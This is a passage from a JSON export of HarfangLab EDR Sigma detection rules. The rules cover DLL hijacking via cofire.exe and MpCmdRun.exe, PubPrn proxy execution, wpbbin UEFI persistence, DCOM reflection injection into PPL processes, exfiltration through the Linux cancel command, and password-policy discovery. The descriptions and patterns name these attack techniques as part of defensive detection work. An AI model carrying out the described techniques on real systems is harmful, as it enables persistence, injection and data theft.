'/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n 
Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n exclusion_bitdefender:\n Image: '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n 
Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_cleanmymac:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.macpaw.CleanMyMac*'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ec2971ff-f461-448f-b31a-78f6ddee6cca",
"rule_name": "Suspicious Read Access to TextEdit Autosave Files",
"rule_description": "Detects a process reading TextEdit autosave files.\nAdversaries may target autosaved files on local systems to collect sensitive information.\nIt is recommended to check whether the process that accessed the file had legitimate reasons to do so.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ec366893-fa2d-48de-bf9b-e5f2c7e4077b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081888Z",
"creation_date": "2026-03-23T11:45:34.081890Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081894Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cofir.yml",
"content": "title: DLL Hijacking via cofire.exe\nid: ec366893-fa2d-48de-bf9b-e5f2c7e4077b\ndescription: |\n Detects potential Windows DLL Hijacking via cofire.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'cofire.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\version.dll'\n - '\\wdi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ec366893-fa2d-48de-bf9b-e5f2c7e4077b",
"rule_name": "DLL Hijacking via cofire.exe",
"rule_description": "Detects potential Windows DLL Hijacking via cofire.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ec741c91-d0ea-4b80-9b52-5cf7d569769a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591822Z",
"creation_date": "2026-03-23T11:45:34.591826Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591833Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://www.bleepingcomputer.com/news/security/lockbit-ransomware-abuses-windows-defender-to-load-cobalt-strike/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mpcmdrun.yml",
"content": "title: DLL Hijacking via MpCmdRun.exe\nid: ec741c91-d0ea-4b80-9b52-5cf7d569769a\ndescription: |\n Detects potential Windows DLL Hijacking via MpCmdRun.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers can use the legitimate and signed MpCmdRun.exe to load a malicious DLL named mpclient.dll and planted in the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://www.bleepingcomputer.com/news/security/lockbit-ransomware-abuses-windows-defender-to-load-cobalt-strike/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/08/01\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MpCmdRun.exe'\n ProcessSignature: 'Microsoft Windows Publisher'\n ImageLoaded|endswith: '\\mpclient.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Program Files\\Windows Defender\\'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Program Files\\Windows Defender\\'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n exclusion_legitimate_dll:\n 
sha256:\n - '30986d2796f29d3e734be1012c8eca44f57abadd1b33d12adfb18a5eaea6b632'\n - 'fa1125bd8cdbb13c6ced323a737672ddc5c2b396210035d6e524e86a77272c07'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ec741c91-d0ea-4b80-9b52-5cf7d569769a",
"rule_name": "DLL Hijacking via MpCmdRun.exe",
"rule_description": "Detects potential Windows DLL Hijacking via MpCmdRun.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers can use the legitimate and signed MpCmdRun.exe to load a malicious DLL named mpclient.dll and planted in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-08-01",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ed39c261-6c1f-4562-a747-46a7be695c9f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071384Z",
"creation_date": "2026-03-23T11:45:34.071386Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071390Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Scripts/Pubprn/",
"https://github.com/op7ic/EDR-Testing-Script/blob/master/runtests.bat#L268",
"https://attack.mitre.org/techniques/T1216/001/"
],
"name": "t1216_001_pubprn_proxy_execution.yml",
"content": "title: PubPrn.vbs Proxy Execution\nid: ed39c261-6c1f-4562-a747-46a7be695c9f\ndescription: |\n Detects the execution of the Windows PubPrn.vbs script with suspicious arguments.\n PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the Windows Command Shell via Cscript.exe.\n Adversaries may use PubPrn to proxy execution of malicious remote files in an attempt to evade detection.\n It is recommended to analyze the script pointed to by the command line, as well as the execution context of the program running the PubPrn script.\nreferences:\n - https://lolbas-project.github.io/lolbas/Scripts/Pubprn/\n - https://github.com/op7ic/EDR-Testing-Script/blob/master/runtests.bat#L268\n - https://attack.mitre.org/techniques/T1216/001/\ndate: 2025/10/10\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.PubPrn\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine|contains|all:\n - '\\pubprn.vbs'\n - 'script:'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ed39c261-6c1f-4562-a747-46a7be695c9f",
"rule_name": "PubPrn.vbs Proxy Execution",
"rule_description": "Detects the execution of the Windows PubPrn.vbs script with suspicious arguments.\nPubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the Windows Command Shell via Cscript.exe.\nAdversaries may use PubPrn to proxy execution of malicious remote files in an attempt to evade detection.\nIt is recommended to analyze the script pointed to by the command line, as well as the execution context of the program running the PubPrn script.\n",
"rule_creation_date": "2025-10-10",
"rule_modified_date": "2025-10-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1216.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ed5d6af8-fae2-413c-8d87-95346a6aa412",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077711Z",
"creation_date": "2026-03-23T11:45:34.077713Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077717Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://persistence-info.github.io/Data/wpbbin.html",
"https://attack.mitre.org/techniques/T1542/001/"
],
"name": "t1542_001_possible_uefi_persistance_with_wpbbin.yml",
"content": "title: Possible UEFI Persistence via wpbbin.exe Detected\nid: ed5d6af8-fae2-413c-8d87-95346a6aa412\ndescription: |\n Detects the creation of the wpbbin.exe executable file in the System32 folder, which can be indicative of UEFI persistence.\n wpbbin.exe is a file placed by the BIOS in System32 and is executed by smss.exe during OS startup.\n Malicious actors can use this feature as a persistence mechanism by placing a malicious wpbbin.exe that will be executed at the next startup.\n It is recommended to investigate the wpbbin.exe binary to determine its legitimacy as well as to look for other suspicious behavior associated with this process.\nreferences:\n - https://persistence-info.github.io/Data/wpbbin.html\n - https://attack.mitre.org/techniques/T1542/001/\ndate: 2022/07/20\nmodified: 2025/02/17\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1542.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path: '?:\\Windows\\System32\\wpbbin.exe'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ed5d6af8-fae2-413c-8d87-95346a6aa412",
"rule_name": "Possible UEFI Persistence via wpbbin.exe Detected",
"rule_description": "Detects the creation of the wpbbin.exe executable file in the System32 folder, which can be indicative of UEFI persistence.\nwpbbin.exe is a file placed by the BIOS in System32 and is executed by smss.exe during OS startup.\nMalicious actors can use this feature as a persistence mechanism by placing a malicious wpbbin.exe that will be executed at the next startup.\nIt is recommended to investigate the wpbbin.exe binary to determine its legitimacy as well as to look for other suspicious behavior associated with this process.\n",
"rule_creation_date": "2022-07-20",
"rule_modified_date": "2025-02-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1542.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ed5f37fa-eb11-49c8-b955-c916c6bb9c47",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621901Z",
"creation_date": "2026-03-23T11:45:34.621903Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621907Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://googleprojectzero.blogspot.com/2025/01/windows-bug-class-accessing-trapped-com.html",
"https://mohamed-fakroud.gitbook.io/red-teamings-dojo/abusing-idispatch-for-trapped-com-object-access-and-injecting-into-ppl-processes",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_dotnet_dcomreflection_enabled_via_registry.yml",
"content": "title: .NET DCOM Reflection Enabled via Registry\nid: ed5f37fa-eb11-49c8-b955-c916c6bb9c47\ndescription: |\n Detects DCOM reflection enabled using the Registry.\n James Forshaw from Google Project Zero discovered a vulnerability in how certain COM servers, particularly those implementing the IDispatch interface, allow the creation of arbitrary objects within the process.\n By manipulating registry keys to enable DCOM reflection and redirect COM activation, the system is tricked into treating a legacy COM class (StdFont) as a .NET System.Object, effectively bridging the native and managed worlds.\n This can be used in order to inject arbitrary .NET code into Protected Process Light (PPL) processes.\n It is recommended to investigate the process that set this registry value and its process tree.\nreferences:\n - https://googleprojectzero.blogspot.com/2025/01/windows-bug-class-accessing-trapped-com.html\n - https://mohamed-fakroud.gitbook.io/red-teamings-dojo/abusing-idispatch-for-trapped-com-object-access-and-injecting-into-ppl-processes\n - https://attack.mitre.org/techniques/T1055/\ndate: 2025/03/03\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\AllowDCOMReflection'\n Details: 'DWORD (0x00000001)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p 
-s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ed5f37fa-eb11-49c8-b955-c916c6bb9c47",
"rule_name": ".NET DCOM Reflection Enabled via Registry",
"rule_description": "Detects DCOM reflection enabled using the Registry.\nJames Forshaw from Google Project Zero discovered a vulnerability in how certain COM servers, particularly those implementing the IDispatch interface, allow the creation of arbitrary objects within the process.\nBy manipulating registry keys to enable DCOM reflection and redirect COM activation, the system is tricked into treating a legacy COM class (StdFont) as a .NET System.Object, effectively bridging the native and managed worlds.\nThis can be used in order to inject arbitrary .NET code into Protected Process Light (PPL) processes.\nIt is recommended to investigate the process that set this registry value and its process tree.\n",
"rule_creation_date": "2025-03-03",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ed648faa-53a0-4b80-970f-0d08b4d025ca",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087592Z",
"creation_date": "2026-03-23T11:45:34.087594Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087601Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://gtfobins.github.io/gtfobins/cancel/",
"https://attack.mitre.org/techniques/T1048/"
],
"name": "t1048_cancel_exfilt_lolbin.yml",
"content": "title: Possible Data Exfiltration via Cancel\nid: ed648faa-53a0-4b80-970f-0d08b4d025ca\ndescription: |\n Detects an attempt to send a file through the network using the cancel command.\n Cancel is a Linux command that is used to cancel print jobs by sending an HTTP request with a custom user.\n Attackers can exploit this by using this HTTP request and replacing the user with the data they want to exfiltrate.\n It is recommended to verify if the address specified in the request is a legitimate print job handler.\nreferences:\n - https://gtfobins.github.io/gtfobins/cancel/\n - https://attack.mitre.org/techniques/T1048/\ndate: 2023/06/29\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1048\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Cancel\n - classification.Linux.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_image:\n ProcessImage|endswith: '/cancel'\n CommandLine|contains: ' -u '\n\n selection_host:\n CommandLine|contains:\n - ' -h *:??'\n - ' -h *:???'\n - ' -h *:????'\n - ' -h *:?????'\n\n condition: all of selection_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ed648faa-53a0-4b80-970f-0d08b4d025ca",
"rule_name": "Possible Data Exfiltration via Cancel",
"rule_description": "Detects an attempt to send a file through the network using the cancel command.\nCancel is a Linux command that is used to cancel print jobs by sending an HTTP request with a custom user.\nAttackers can exploit this by using this HTTP request and replacing the user with the data they want to exfiltrate.\nIt is recommended to verify if the address specified in the request is a legitimate print job handler.\n",
"rule_creation_date": "2023-06-29",
"rule_modified_date": "2025-02-18",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "eda4c668-8c9e-41ea-801f-e3bd359382b4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605654Z",
"creation_date": "2026-03-23T11:45:34.605658Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605665Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1201/"
],
"name": "t1201_net_accounts.yml",
"content": "title: Password Policy Discovered via net accounts\nid: eda4c668-8c9e-41ea-801f-e3bd359382b4\ndescription: |\n Detects the execution of net.exe to discover the local accounts configuration, including password policy configuration.\n This activity may indicate a potential security threat or malicious behavior.\n It is recommended to investigate the parent processes for other suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1201/\ndate: 2022/12/02\nmodified: 2025/10/27\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1201\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\net1.exe'\n - OriginalFileName: 'net1.exe'\n\n selection_cmd:\n CommandLine|contains: ' accounts'\n # Filter-out missing parents\n ParentImage|contains: '?'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|?:\\Windows\\System32\\wsmprovhost.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|'\n - '|?:\\Windows\\System32\\wbem\\WmiPrvSE.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|'\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseIR.exe'\n - '\\CyberwatchAgent\\cyberwatch-agent.exe'\n - '?:\\Windows\\AdminArsenal\\PDQInventory-Scanner\\service-?\\PDQInventory-Scanner-?.exe'\n - '?:\\Windows\\AdminArsenal\\PDQDeployRunner\\service-?\\PDQDeployRunner-?.exe'\n - '?:\\Program Files (x86)\\wapt\\waptpython.exe'\n - '?:\\Program Files (x86)\\wapt\\waptservice.exe'\n - '?:\\Program Files (x86)\\CyberCNSAgent\\cybercnsagent.exe'\n - 